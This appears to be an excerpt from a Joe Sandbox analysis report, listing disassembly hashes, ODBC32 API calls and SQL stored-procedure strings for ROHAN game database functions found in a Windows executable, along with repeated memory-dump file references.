                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_UpdateCharacterRecipe](?,?,?,?)}
                                                                                      • API String ID: 0-658507254
                                                                                      • Opcode ID: 6c6134fa0252cc86fcadf8f0e5514e5f2fec836c449526ed3bd4b8a8cf0d0336
                                                                                      • Instruction ID: c31d15dbfbdebe88740fdd6465560b5ea3dd67e79fa610cec8f959680bb28513
                                                                                      • Opcode Fuzzy Hash: 6c6134fa0252cc86fcadf8f0e5514e5f2fec836c449526ed3bd4b8a8cf0d0336
                                                                                      • Instruction Fuzzy Hash: DB41F4B16902187BFB249B54CC92FAE7374EB48B24F20C789F7146E6C5D9B1AD408F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_DeleteMapMemo] (?, ?, ?, ?)},000000FD), ref: 00431885
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004318C4
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004318F9
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00431931
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 00431969
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 004319A1
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_DeleteMapMemo] (?, ?, ?, ?)}, xrefs: 0043187C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_DeleteMapMemo] (?, ?, ?, ?)}
                                                                                      • API String ID: 0-2507592454
                                                                                      • Opcode ID: 9a8f094366c63a5ddea5a2af19ba7c5791ead1105ff886b99b1c74100880a52a
                                                                                      • Instruction ID: 3d9b26e1621404a59247f97e1d8f461fe836af72d5e1b7eb4ceb0b3fe5f05cd0
                                                                                      • Opcode Fuzzy Hash: 9a8f094366c63a5ddea5a2af19ba7c5791ead1105ff886b99b1c74100880a52a
                                                                                      • Instruction Fuzzy Hash: 4341E371640215BBEB648B44CC52FAE73B5FB84B18F20C389F75C6E2C5DDB169808B98
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [Rohangame_pLucky_InsNumUser] (?, ?, ?, ?)},000000FD), ref: 00441901
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0044194D
                                                                                      • #72.ODBC32(?,00000000,00000001,0000005D,0000005D,00000013,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0044198A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,0000005D,0000005D,00000013), ref: 004419BF
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004419F7
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 00441A2F
                                                                                      Strings
                                                                                      • { ? = CALL [Rohangame_pLucky_InsNumUser] (?, ?, ?, ?)}, xrefs: 004418F8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [Rohangame_pLucky_InsNumUser] (?, ?, ?, ?)}
                                                                                      • API String ID: 0-3440343539
                                                                                      • Opcode ID: 07fb80739640b1ae9d618b36edaec905bfaf5d25929996c9942a56ec551ddedb
                                                                                      • Instruction ID: 85f783b03a47a85904e1ad61167694cc9cd484bc16a110526d1e065af64e8952
                                                                                      • Opcode Fuzzy Hash: 07fb80739640b1ae9d618b36edaec905bfaf5d25929996c9942a56ec551ddedb
                                                                                      • Instruction Fuzzy Hash: 034110F46482157BEB348B64CC52FEA7374EB84B14F108389F6256E6C1D5B27F408B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetItemMallPaging](?,?,?,?)},000000FD), ref: 004358D0
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043590F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00435944
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043597C
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 004359B4
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 004359EC
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetItemMallPaging](?,?,?,?)}, xrefs: 004358C7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetItemMallPaging](?,?,?,?)}
                                                                                      • API String ID: 0-651572280
                                                                                      • Opcode ID: 0a8f35caf1c0ff5d4a98635334b4e16910803f1db58ed6631bfcc3fd7fb14814
                                                                                      • Instruction ID: 1c72afaf01ec349dbdd55d10c45c7eef017cf294a5a71be15835eb9bf9cb367e
                                                                                      • Opcode Fuzzy Hash: 0a8f35caf1c0ff5d4a98635334b4e16910803f1db58ed6631bfcc3fd7fb14814
                                                                                      • Instruction Fuzzy Hash: 6E4112B5A44215BBFB20DB54CD52FAA7374EB84B1CF208288F71C6E2C5D7B16D418B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_PkRecall] (?, ?, ?, ?)},000000FD), ref: 0042F8D6
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042F915
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042F94A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042F982
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042F9BA
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0042F9F2
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_PkRecall] (?, ?, ?, ?)}, xrefs: 0042F8CD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_PkRecall] (?, ?, ?, ?)}
                                                                                      • API String ID: 0-371763479
                                                                                      • Opcode ID: 11a46b2eef8c85e2405c5aee4ffdc3d6bfe32bcd15671aa02515b7213cc3d525
                                                                                      • Instruction ID: ee227317ed65b24677507f655dedebe852934ccbe64cae242794dfb8dadcc788
                                                                                      • Opcode Fuzzy Hash: 11a46b2eef8c85e2405c5aee4ffdc3d6bfe32bcd15671aa02515b7213cc3d525
                                                                                      • Instruction Fuzzy Hash: 604139B46452147FEB64CB44CC52F957339EBC5B28F204288F71D6F6C0D9B26D908B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN2_SaveConquerorLevel] (?, ?, ?, ?)},000000FD), ref: 00440983
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004409C2
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004409F7
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00440A2F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00440A67
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00440A9F
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN2_SaveConquerorLevel] (?, ?, ?, ?)}, xrefs: 0044097A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN2_SaveConquerorLevel] (?, ?, ?, ?)}
                                                                                      • API String ID: 0-2421593798
                                                                                      • Opcode ID: ad86b2487ebf2b64068ad3c714852e9fbfd4c26b91f1afdd117f5272a53004d8
                                                                                      • Instruction ID: 2b3ea50b07fb020980b91e62922501852f3a47af161d7a2001f1eff741325196
                                                                                      • Opcode Fuzzy Hash: ad86b2487ebf2b64068ad3c714852e9fbfd4c26b91f1afdd117f5272a53004d8
                                                                                      • Instruction Fuzzy Hash: E84133B46812157BEB249B55CC42FED7374EB84B18F108288F718AE2C5D5B16D608F98
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetCostumeBank] (?,?,?,?)},000000FD), ref: 00440AC9
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00440B08
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00440B3D
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00440B75
                                                                                      • #72.ODBC32(?,00000000,00000004,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00440BAD
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000FA,000000FA,00000000), ref: 00440BE5
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetCostumeBank] (?,?,?,?)}, xrefs: 00440AC0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetCostumeBank] (?,?,?,?)}
                                                                                      • API String ID: 0-1545703041
                                                                                      • Opcode ID: f6f719d730ec1c790280f8c6a1fc41dda855bf95f3ce6e54d0d3d7b90a2d799c
                                                                                      • Instruction ID: 05aae0c90010e99a1b051eb5d59b2375066faeaa8e9e2edaa5d05fc8e3011e35
                                                                                      • Opcode Fuzzy Hash: f6f719d730ec1c790280f8c6a1fc41dda855bf95f3ce6e54d0d3d7b90a2d799c
                                                                                      • Instruction Fuzzy Hash: 344112B4644214BBEB24DB45DC52FEA7375EB84B18F2083C8F714AE2D5C5B16DA08B5C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_ItemControlLog] (?,?,?,?)},000000FD), ref: 004386E6
